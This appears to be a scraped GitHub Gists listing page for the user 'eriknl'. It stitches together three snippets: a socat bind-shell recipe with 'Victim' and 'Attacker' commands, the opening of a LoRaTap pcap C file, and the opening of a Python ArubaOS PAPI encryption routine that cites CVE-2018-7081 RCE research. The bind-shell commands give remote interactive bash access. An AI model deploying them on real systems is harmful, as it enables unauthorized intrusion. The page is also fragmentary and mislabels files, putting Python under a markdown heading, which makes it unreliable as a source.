socat bind shell
Victim
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp-listen:4444
Attacker
socat -,raw,echo=0 tcp:127.0.0.1:4444
Erik de Jong eriknl
eriknl
/ loratap-example.c
Created
June 7, 2021 20:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "loratap.h" | |
| #include <string.h> | |
| #include <stdio.h> | |
| #include <arpa/inet.h> | |
| #define LINKTYPE_LORA_LORATAP 270 | |
| typedef struct pcap_hdr_s { | |
| uint32_t magic_number; /* magic number */ | |
| uint16_t version_major; /* major version number */ |
eriknl
/ socat-bind.md
Created
March 6, 2020 14:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| from struct import * | |
| """ | |
| This implementation was reverse engineered using Wireshark (and source code), strace and two excellent articles: | |
| - https://x-c3ll.github.io/posts/CVE-2018-7081-RCE-ArubaOS/ | |
| - https://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html | |
| """ | |
| def papi_encrypt(data): |